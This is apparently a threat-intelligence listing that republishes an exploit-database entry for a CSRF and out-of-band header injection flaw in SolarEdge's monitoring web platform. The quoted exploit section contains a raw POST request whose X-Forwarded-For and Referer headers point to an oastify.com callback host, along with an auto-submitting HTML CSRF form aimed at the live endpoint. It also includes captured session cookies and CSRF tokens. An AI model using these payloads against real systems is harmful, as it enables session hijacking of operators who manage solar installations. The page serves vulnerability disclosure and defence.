solaredge - (CSRF-OOB-Injection)
This entry describes a medium-severity Cross-Site Request Forgery (CSRF) vulnerability with Out-Of-Band (OOB) injection characteristics affecting SolarEdge. The exploit involves leveraging CSRF to perform unauthorized actions potentially involving OOB data injection. No specific affected versions or detailed technical impact are provided. Exploit code is available in text format. No patch or vendor advisory information is provided, and no known exploits in the wild have been reported.
AI Analysis
Technical Summary
The reported vulnerability is a CSRF-OOB injection exploit targeting SolarEdge products or services. CSRF vulnerabilities allow attackers to induce users to execute unwanted actions on a web application in which they are authenticated. The OOB injection aspect suggests that the exploit may involve sending data or triggering actions that occur outside the normal request-response cycle, but no further technical details are given. There is no information on affected versions or vendor remediation.
Potential Impact
The impact is rated medium severity based on the provided data. Without detailed technical or vendor information, the precise consequences are unclear, but CSRF vulnerabilities typically allow unauthorized actions under the context of an authenticated user, potentially leading to unauthorized configuration changes or data manipulation.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. No official fix or mitigation instructions are provided. Until a vendor advisory is available, users should consider standard CSRF mitigations such as validating anti-CSRF tokens and restricting actions to POST requests where applicable, but these are general recommendations and may not fully address this specific issue.
Indicators of Compromise
- exploit-code: # Titles: solaredge - (CSRF-OOB-Injection) # Author: nu11secur1tyAI # Date: 2026-04-26 # Vendor: SolarEdge Technologies Ltd. # Software: SolarEdge Monitoring Platform - Framework /solaredge-web/ # Reference: https://monitoring.solaredge.com/ ## Description: The solaredge-CSRF-Hijack vulnerability arises due to a critical business logic flaw in the `/solaredge-web/p/initClient` endpoint. The system allows the generation and overwriting of session parameters (`createCookie`) via POST requests that are not properly validated against their origin. An attacker can exploit this flaw to force a legitimate operator's browser to execute unauthorized commands without their knowledge. Additionally, an Out-of-Band (OOB) injection vulnerability was discovered via the `X-Forwarded-For` and `Referer` headers. By manipulating these headers, an attacker forces the SolarEdge internal infrastructure to initiate requests to external, attacker-controlled domains (e.g., oastify.com or a custom malicious site). This demonstrates a lack of framework-level filtration, leading to session compromise and potential unauthorized control over physical photovoltaic systems. STATUS: MEDIUM - HIGH/ Vulnerability [+]Payload: ``` POST POST /solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue HTTP/2 Host: monitoring.solaredge.com Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="146", "Not;A=Brand";v="24", "Google Chrome";v="146" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" X-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2; cf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ; __cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb; CSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90 Origin: https://monitoring.solaredge.com Referer: http://cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com/vulnerabilities/ Content-Length: 0 ``` [+]Exploit: ```html <html> <!-- CSRF PoC --> <body> <form action=" https://monitoring.solaredge.com/solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue" method="POST"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` # Demo: [href](https://www.patreon.com/posts/solaredge-csrf-156577436) # Time spent: 01:25:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
solaredge - (CSRF-OOB-Injection)
Description
This entry describes a medium-severity Cross-Site Request Forgery (CSRF) vulnerability with Out-Of-Band (OOB) injection characteristics affecting SolarEdge. The exploit involves leveraging CSRF to perform unauthorized actions potentially involving OOB data injection. No specific affected versions or detailed technical impact are provided. Exploit code is available in text format. No patch or vendor advisory information is provided, and no known exploits in the wild have been reported.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The reported vulnerability is a CSRF-OOB injection exploit targeting SolarEdge products or services. CSRF vulnerabilities allow attackers to induce users to execute unwanted actions on a web application in which they are authenticated. The OOB injection aspect suggests that the exploit may involve sending data or triggering actions that occur outside the normal request-response cycle, but no further technical details are given. There is no information on affected versions or vendor remediation.
Potential Impact
The impact is rated medium severity based on the provided data. Without detailed technical or vendor information, the precise consequences are unclear, but CSRF vulnerabilities typically allow unauthorized actions under the context of an authenticated user, potentially leading to unauthorized configuration changes or data manipulation.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. No official fix or mitigation instructions are provided. Until a vendor advisory is available, users should consider standard CSRF mitigations such as validating anti-CSRF tokens and restricting actions to POST requests where applicable, but these are general recommendations and may not fully address this specific issue.
Technical Details
- Edb Id
- 52569
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for solaredge - (CSRF-OOB-Injection)
# Titles: solaredge - (CSRF-OOB-Injection) # Author: nu11secur1tyAI # Date: 2026-04-26 # Vendor: SolarEdge Technologies Ltd. # Software: SolarEdge Monitoring Platform - Framework /solaredge-web/ # Reference: https://monitoring.solaredge.com/ ## Description: The solaredge-CSRF-Hijack vulnerability arises due to a critical business logic flaw in the `/solaredge-web/p/initClient` endpoint. The system allows the generation and overwriting of session parameters (`createCookie`) via POST requests tha... (6910 more characters)
Threat ID: 6a0f29ffe1370fbb48ed2e99
Added to database: 5/21/2026, 3:51:27 PM
Last enriched: 5/21/2026, 3:52:07 PM
Last updated: 5/21/2026, 5:13:33 PM
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.